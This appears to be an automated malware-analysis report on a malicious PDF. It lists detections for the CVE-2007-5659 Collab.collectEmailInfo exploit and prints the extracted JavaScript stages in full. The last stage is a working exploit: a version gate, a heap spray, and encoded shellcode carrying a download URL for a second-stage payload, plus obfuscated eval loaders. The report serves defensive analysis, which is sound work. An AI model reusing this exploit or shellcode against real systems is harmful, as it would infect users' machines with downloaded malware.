Malware Insights
The PDF document contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript and JS streams. The extracted JavaScript files, particularly 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', suggest an attempt to obfuscate and execute code. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic further points to a technique where the PDF launcher decodes and evaluates JavaScript. The primary intent appears to be downloading and executing a second-stage payload, though the specific URL or execution method is not directly discernible from the provided artifacts.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATEPDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.Matched line in script
var bP4Or____gi = new Array();var LGP8____j__W_F = 0;var Yye3o_vjVXl = "";function pUBr_O_18_yq(T_2_bQ_M3Ap, M_np00Vn30E11j){var P_5C_70m__w_5 = M_np00Vn30E11j.toString();var l3p6_8p2j_Uib15 = "";for(var BCIEFj_1_BS = 0; BCIEFj_1_BS < P_5C_70m__w_5.length; BCIEFj_1_BS++) {var pk0l_70dWE0 = parseInt(P_5C_70m__w_5.substr(BCIEFj_1_BS, 1));if (!isNaN(pk0l_70dWE0)) {pk0l_70dWE0 = pk0l_70dWE0.toString(16);if (pk0l_70dWE0.length == 1) { pk0l_70dWE0 = "0" + pk0l_70dWE0; }else if (pk0l_70dWE0.length != 2 … -
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCANPDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://googleinru.in/cgi-bin/etn/z002106201r0019Rf7577e2fX24a65b0dY53bfb0c6Z0100f060 Referenced by PDF JavaScript
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0004_000.js |
pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1940 bytes |
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
var result = "";
var list = str.split(',');
for (var i=0; i < list.length; i++) {
result += String.fromCharCode(list[i] - jump);
}
return result;
}
|
|||
numeric_charcode_stage_000.js |
deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 505 bytes |
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
var proc = String.fromCharCode(22+15);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
}
if (app.plugIns.length >= 2) {
fnc += 'l';
app[fnc](buf);
}
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1C55 | 1851 bytes |
SHA-256: 929f530db04579c059a9ad694942ebba650b28c2e9b75514e822a169f18d78b9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function EQ_kU1J_Pje13p(s68Jm_UnTD__2s, Q_e3JU_5g){var sSftP_t = 4;var NB24__5EE51__cu = new Array();var i320ffN_ulu = new Array(107,256,11, 512, 106, 11, 44,40, 33);i320ffN_ulu[5] += 12;var VX_J__33pm_2 = "";try {var h_AyT_Y71_40k86 = 0;if (app) {Q_e3JU_5g = pr[h_AyT_Y71_40k86].subject;}} catch(e) {}if (!s68Jm_UnTD__2s) { NB24__5EE51__cu[0] = 0;NB24__5EE51__cu[1] = NB24__5EE51__cu[0];NB24__5EE51__cu[2] = NB24__5EE51__cu[1];NB24__5EE51__cu[3] = NB24__5EE51__cu[2];var hd_0_jFU48_j = i320ffN_ulu[6] + 3;var J84r_ijw = hd_0_jFU48_j + 11;var jmR0F3VS_20F_J = EQ_kU1J_Pje13p;var A3lg5qVX6Xh = 0;jmR0F3VS_20F_J = jmR0F3VS_20F_J.toString();for(var Sm0C6_8LN = 0; Sm0C6_8LN < jmR0F3VS_20F_J.length; Sm0C6_8LN++) {var P6ym0r_O8 = jmR0F3VS_20F_J.charCodeAt(Sm0C6_8LN);if (P6ym0r_O8 > hd_0_jFU48_j && P6ym0r_O8 < J84r_ijw) {if (A3lg5qVX6Xh == 4) {A3lg5qVX6Xh = 0;}NB24__5EE51__cu[A3lg5qVX6Xh] += P6ym0r_O8;if (NB24__5EE51__cu[A3lg5qVX6Xh] > i320ffN_ulu[3]) {NB24__5EE51__cu[A3lg5qVX6Xh] -= 512;}A3lg5qVX6Xh++;}}}else { NB24__5EE51__cu = s68Jm_UnTD__2s;}for (var Xi5K_Hf_b_72_M = 0; Xi5K_Hf_b_72_M < 4; Xi5K_Hf_b_72_M++) {if (NB24__5EE51__cu[Xi5K_Hf_b_72_M] > i320ffN_ulu[1]) {NB24__5EE51__cu[Xi5K_Hf_b_72_M] -= i320ffN_ulu[1];}}var Onh__4tY8_bxn = 0;var Iwo5Y__185_Jd = 0;var GO__Dt;var aldFub7Rwr = 0;while ( Onh__4tY8_bxn < Q_e3JU_5g.length ) {var FJ1UX_41 = "";FJ1UX_41 = Q_e3JU_5g.substr(Onh__4tY8_bxn, 2);var T_3__24_v = parseInt(FJ1UX_41, i320ffN_ulu[5]); if (Iwo5Y__185_Jd == 4) {Iwo5Y__185_Jd = 0;}T_3__24_v -= (aldFub7Rwr + 2) * NB24__5EE51__cu[Iwo5Y__185_Jd];if (T_3__24_v < 0) {T_3__24_v -= Math.floor(T_3__24_v / i320ffN_ulu[1]) * i320ffN_ulu[1];}VX_J__33pm_2 += String.fromCharCode(T_3__24_v);{Onh__4tY8_bxn += 2;aldFub7Rwr++;Iwo5Y__185_Jd++;}}var VVd_mM435 = this;VVd_mM435["eval"](VX_J__33pm_2);return 0;}
EQ_kU1J_Pje13p(0);
|
|||
legacy_pdfkit_stage_001.js |
deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x4C3 | 5031 bytes |
SHA-256: 13a99d9106d5c81716df2e1fea66a60680acf737f1c7a15a11bf1088c93d08cd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var bP4Or____gi = new Array();var LGP8____j__W_F = 0;var Yye3o_vjVXl = "";function pUBr_O_18_yq(T_2_bQ_M3Ap, M_np00Vn30E11j){var P_5C_70m__w_5 = M_np00Vn30E11j.toString();var l3p6_8p2j_Uib15 = "";for(var BCIEFj_1_BS = 0; BCIEFj_1_BS < P_5C_70m__w_5.length; BCIEFj_1_BS++) {var pk0l_70dWE0 = parseInt(P_5C_70m__w_5.substr(BCIEFj_1_BS, 1));if (!isNaN(pk0l_70dWE0)) {pk0l_70dWE0 = pk0l_70dWE0.toString(16);if (pk0l_70dWE0.length == 1) { pk0l_70dWE0 = "0" + pk0l_70dWE0; }else if (pk0l_70dWE0.length != 2) { pk0l_70dWE0 = "00"; }l3p6_8p2j_Uib15 = pk0l_70dWE0 + l3p6_8p2j_Uib15;}}while(l3p6_8p2j_Uib15.length < 8) { l3p6_8p2j_Uib15 = "0" + l3p6_8p2j_Uib15; }var ln_4R__x = T_2_bQ_M3Ap.toString(16);if (ln_4R__x.length == 1) { ln_4R__x = "0" + ln_4R__x; }else if (ln_4R__x.length != 2) { ln_4R__x = "00"; }l3p6_8p2j_Uib15 = "3" + ln_4R__x + "P" + l3p6_8p2j_Uib15;return l3p6_8p2j_Uib15;}function Ch_b__7F(iJ_F__P, f_Aj74_M2evj){var EH32M_7_4cu_iL = new Array("");var Vy_8g2l_25XS_Et = iJ_F__P;var pO7W_Y5y;if ((pO7W_Y5y = iJ_F__P.lastIndexOf("%u00")) != -1) {if (pO7W_Y5y + 6 == iJ_F__P.length) {EH32M_7_4cu_iL[0] = iJ_F__P.substr(pO7W_Y5y + 4, 2);Vy_8g2l_25XS_Et = iJ_F__P.substring(0, pO7W_Y5y);}}pO7W_Y5y = 1;for (BCIEFj_1_BS = 0; BCIEFj_1_BS < f_Aj74_M2evj.length; BCIEFj_1_BS++) {var T_E_0_N_JH0_S = f_Aj74_M2evj.charCodeAt(BCIEFj_1_BS).toString(16);if (T_E_0_N_JH0_S.length == 1) { T_E_0_N_JH0_S = "0" + T_E_0_N_JH0_S; }EH32M_7_4cu_iL[pO7W_Y5y] = T_E_0_N_JH0_S;pO7W_Y5y++;}BCIEFj_1_BS = EH32M_7_4cu_iL[0].length ? 0 : 1;EH32M_7_4cu_iL[pO7W_Y5y] = "00";EH32M_7_4cu_iL[pO7W_Y5y + 1] = "00";pO7W_Y5y += 2;if ((EH32M_7_4cu_iL.length - BCIEFj_1_BS) % 2) {EH32M_7_4cu_iL[pO7W_Y5y] = "00";}while(BCIEFj_1_BS < EH32M_7_4cu_iL.length) {Vy_8g2l_25XS_Et += "%u" + EH32M_7_4cu_iL[BCIEFj_1_BS + 1] + EH32M_7_4cu_iL[BCIEFj_1_BS];BCIEFj_1_BS += 2;}Vy_8g2l_25XS_Et += "%u0000";return Vy_8g2l_25XS_Et;}function E0v7W0nCf(E42FFwd, hN_RnS){while (E42FFwd.length*2<hN_RnS) {E42FFwd += E42FFwd;}E42FFwd = E42FFwd.substring(0,hN_RnS/2);return E42FFwd;}function S_aE4_8_h34h3Yr(k160Ra__qli, y41eH_wjbxq, CoW0_imV){var JA3e2_G_w = 0x0c0c0c0c;var E42FFwd = unescape(y41eH_wjbxq);var f_Aj74_M2evj = pUBr_O_18_yq(k160Ra__qli, CoW0_imV);var PqK_L7g = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var iJ_F__P = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6a70%u6e74%u0049%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u6652%u3537%u3737%u3265%u5866%u3432%u3661%u6235%u6430%u3559%u6233%u6266%u6330%u5a36%u3130%u3030%u3066%u3036";app.i3_l2T_f = unescape(Ch_b__7F(iJ_F__P, f_Aj74_M2evj));var s2Qw1_l__ih = 0x400000;var Ux_I8J = PqK_L7g.length * 2;var hN_RnS = s2Qw1_l__ih - (Ux_I8J+0x38);E42FFwd = E0v7W0nCf(E42FFwd, hN_RnS);var p_gxw21 = (JA3e2_G_w - 0x400000)/s2Qw1_l__ih;for (var J8_42E_GYo = 0; J8_42E_GYo < p_gxw21; J8_42E_GYo++) {bP4Or____gi[J8_42E_GYo] = E42FFwd + PqK_L7g;}}function wYWQPi_oR_tr(){var vqMDWqeXut2qLS = "";for (BCIEFj_1_BS = 0; BCIEFj_1_BS < 12; BCIEFj_1_BS++) {vqMDWqeXut2qLS += unescape("%u0c0c%u0c0c");}var R01s0qd82 = "";for (BCIEFj_1_BS = 0; BCIEFj_1_BS < 750; BCIEFj_1_BS++) {R01s0qd82 += vqMDWqeXut2qLS;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: R01s0qd82});app.clearTimeOut(LGP8____j__W_F);}function X_6qHcW6Jw1vI1o(Mr_LK____f2){var lG1P3_3_pUYt2N = LGP8____j__W_F;if ((Mr_LK____f2 >= 8 && Mr_LK____f2 < 8.11) || Mr_LK____f2 < 7.1) {S_aE4_8_h34h3Yr(23, "%u0c0c%u0c0c", Mr_LK____f2);wYWQPi_oR_tr();}if (lG1P3_3_pUYt2N) {app.clearTimeOut(lG1P3_3_pUYt2N);}}var CoW0_imV = 0;var D276_6Yh40i5_0 = app.plugIns;for (var kpc081_P2Mc = 0; kpc081_P2Mc < D276_6Yh40i5_0.length; kpc081_P2Mc++) {var x8WG6y = D276_6Yh40i5_0[kpc081_P2Mc].version;if (x8WG6y > CoW0_imV) { CoW0_imV = x8WG6y; }}if (app.viewerVersion == 9.103 && CoW0_imV < 9.13) {CoW0_imV = 9.13;}app.u_2__r7F4_j80 = X_6qHcW6Jw1vI1o;LGP8____j__W_F = app.setTimeOut("app.u_2__r7F4_j80(" + CoW0_imV.toString() + ")", 50);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.